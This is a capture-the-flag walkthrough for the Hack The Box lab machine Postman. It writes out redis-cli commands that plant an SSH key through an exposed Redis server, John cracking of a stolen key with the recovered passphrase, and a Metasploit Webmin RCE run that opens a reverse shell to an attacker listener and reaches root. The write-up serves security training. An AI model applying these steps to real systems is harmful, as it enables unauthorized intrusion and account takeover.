Walkthru for Postman

This is a detailed walk-thru for Postman.htb, written by dR1PPy.

A Good Challenge is Presented by Postman, and learning how to attack ReDis Services. Much thanks to TheCyberGeek

Enumeration

Services
========

host port proto name state info
---- ---- ----- ---- ----- ----
10.10.10.160 22 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
10.10.10.160 80 tcp http open Apache httpd 2.4.29 (Ubuntu)
10.10.10.160 6379 tcp redis open Redis key-value store 4.0.9
10.10.10.160 10000 tcp http open MiniServ 1.910 Webmin httpd
10.10.10.160 10000 udp ndmp open

Attacking Redis Server

We find the Redis service running on port 6379

10.10.10.160 6379 tcp redis open Redis key-value store 4.0.9

We find a working exploit and a few tools to execute the exploit

https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
https://github.com/Avinash-acid/Redis-Server-Exploit

After some trial and error we see the tool keeps failing when setting the directory for our SSH key.

This must mean we need to find another local user to store our key.
We install the redis-server locally and review some of the default settings.

Gaining Access

In /etc/passwd we see the redis users is created but has a shell set to nologin
We also find the default install in /var/lib/redis/

Some more enumeration on the redis server shows us something interesting.
By default the redis user has nologin.
But we see the default dir is set to an SSH directory in redis home.

redis-cli -h postman.htb
postman.htb:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"

This must mean redis user is allowed to login from SSH on the remote server.
We try to use this for our exploit.

redis-cli -h postman.htb flushall
(echo -e "\n\n"; cat ~/.ssh/postman.pub; echo -e "\n\n") > foo.txt
redis-cli -h postman.htb
config get *
(output removed for space)
config get dir (from here we see the dir is set to /var/lib/redis/.ssh/)
1) "dir"
2) "/var/lib/redis/.ssh"
config set dbfilename "authorized_keys"
save
exit

ssh -i ~/.ssh/postman redis@postman.htb

Now we have a limited shell and run our enumeration scripts.
Linux Enumeration script finds another SSH key backup readable to us.

[-] SSH keys/host information found in the following locations:
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
-rw-rw---- 1 redis redis 683 Nov 20 16:22 /var/lib/redis/.ssh/authorized_keys

We grab the key and start to try and crack it with John.

/usr/share/john/ssh2john.py /TARGET/matt_id_rsa > /TARGET/matt_id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt /TARGET/matt_id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (/TARGET/matt_id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:09 DONE (2019-11-20 09:58) 0.1033g/s 1481Kp/s 1481Kc/s 1481KC/sa6_123..*7¡Vamos!
Session completed

We quickly verify our password as working but see we are not allowed direct SSH access.

dr1ppy@hostname:/usr/share/wordlists$ ssh -i /TARGET/matt_id_rsa matt@postman.htb
Enter passphrase for key '/TARGET/matt_id_rsa':
Connection closed by 10.10.10.160 port 22

But using the password in our existing shell we are able to su – to the user Matt.

We also see this account has access the Webmin website.
And from here we can see the webmin version listed.

Webmin version 1.910

Escalation

With this we find a useful module in Metasploit that we can use.
We do a quick verification on the required access for this exploit by accessing the package_update module

https://postman.htb:10000/package-updates/?xnavigation=1

Now we launch or exploit

use exploit/linux/http/webmin_packageup_rce
show options

Module options (exploit/linux/http/webmin_packageup_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.11 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port

Exploit target:

Id Name
-- ----
0 Webmin <= 1.910

Shortly after running our exploit we get a root shell.
We then upgrade our shell with python, and collect up the flag.

[*] Started reverse TCP handler on 10.10.14.11:8080
[+] Session cookie: 1ee6b5ae9fd733b39a1bfc7c6707ad71
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.11:8080 -> 10.10.10.160:52526) at 2019-11-20 11:42:41 -0700
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")'
root@Postman:/usr/share/webmin/package-updates/# cd /root
cd /root/
root@Postman:~# dir
dir
redis-5.0.0 root.txt
root@Postman:~# cat root.txt
cat root.txt

And now we have root token. Thanks for playing!